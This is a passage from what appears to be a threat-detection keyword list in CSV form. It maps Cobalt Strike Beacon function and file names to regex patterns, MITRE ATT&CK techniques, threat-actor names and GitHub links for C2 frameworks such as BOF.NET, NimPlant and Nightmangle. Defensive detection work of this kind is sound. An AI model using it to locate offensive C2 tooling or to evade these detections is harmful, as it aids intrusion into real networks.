- Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35698"
"*beacon_top_callback*",".{0,1000}beacon_top_callback.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","35699"
"*BeaconApi.cs*",".{0,1000}BeaconApi\.cs.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CCob/BOF.NET","1","1","N/A","N/A","10","10","709","105","2024-09-04T17:10:23Z","2020-11-02T20:02:55Z","35700"
"*beacon-c2-go*",".{0,1000}beacon\-c2\-go.{0,1000}","offensive_tool_keyword","cobaltstrike","backdoor c2","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/wahyuhadi/beacon-c2-go","1","1","N/A","N/A","10","10","38","10","2020-01-14T11:15:42Z","2019-12-22T08:59:34Z","35701"
"*BeaconCleanupProcess*",".{0,1000}BeaconCleanupProcess.{0,1000}","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","N/A","10","10","1389","234","2025-03-26T19:36:31Z","2020-07-15T16:21:18Z","35702"
"*BeaconConsoleWriter.cs*",".{0,1000}BeaconConsoleWriter\.cs.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CCob/BOF.NET","1","1","N/A","N/A","10","10","709","105","2024-09-04T17:10:23Z","2020-11-02T20:02:55Z","35703"
"*BeaconGetSpawnTo*",".{0,1000}BeaconGetSpawnTo.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CCob/BOF.NET","1","1","N/A","N/A","10","10","709","105","2024-09-04T17:10:23Z","2020-11-02T20:02:55Z","35704"
"*BeaconGetSpawnTo*",".{0,1000}BeaconGetSpawnTo.{0,1000}","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","N/A","10","10","1389","234","2025-03-26T19:36:31Z","2020-07-15T16:21:18Z","35705"
"*BeaconGetSpawnTo*",".{0,1000}BeaconGetSpawnTo.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35706"
"*BeaconGetSpawnTo*",".{0,1000}BeaconGetSpawnTo.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","35707"
"*beacongrapher.py*",".{0,1000}beacongrapher\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","35708"
"*BeaconInjectProcess*",".{0,1000}BeaconInjectProcess.{0,1000}","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","N/A","10","10","1389","234","2025-03-26T19:36:31Z","2020-07-15T16:21:18Z","35709"
"*BeaconInjectProcess*",".{0,1000}BeaconInjectProcess.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35710"
"*BeaconInjectProcess*",".{0,1000}BeaconInjectProcess.{0,1000}","offensive_tool_keyword","Nightmangle","ightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/1N73LL1G3NC3x/Nightmangle","1","0","N/A","N/A","10","10","156","19","2023-09-26T19:21:31Z","2023-09-26T18:25:23Z","35711"
"*BeaconInjectProcess*",".{0,1000}BeaconInjectProcess.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","35712"
"*BeaconInjectTemporaryProcess*",".{0,1000}BeaconInjectTemporaryProcess.{0,1000}","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","N/A","10","10","1389","234","2025-03-26T19:36:31Z","2020-07-15T16:21:18Z","35713"
"*BeaconInjectTemporaryProcess*",".{0,1000}BeaconInjectTemporaryProcess.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35714"
"*BeaconInjectTemporaryProcess*",".{0,1000}BeaconInjectTemporaryProcess.{0,1000}","offensive_tool_keyword","Nightmangle","ightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/1N73LL1G3NC3x/Nightmangle","1","0","N/A","N/A","10","10","156","19","2023-09-26T19:21:31Z","2023-09-26T18:25:23Z","35715"
"*BeaconJob.cs*",".{0,1000}BeaconJob\.cs.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CCob/BOF.NET","1","1","N/A","N/A","10","10","709","105","2024-09-04T17:10:23Z","2020-11-02T20:02:55Z","35716"
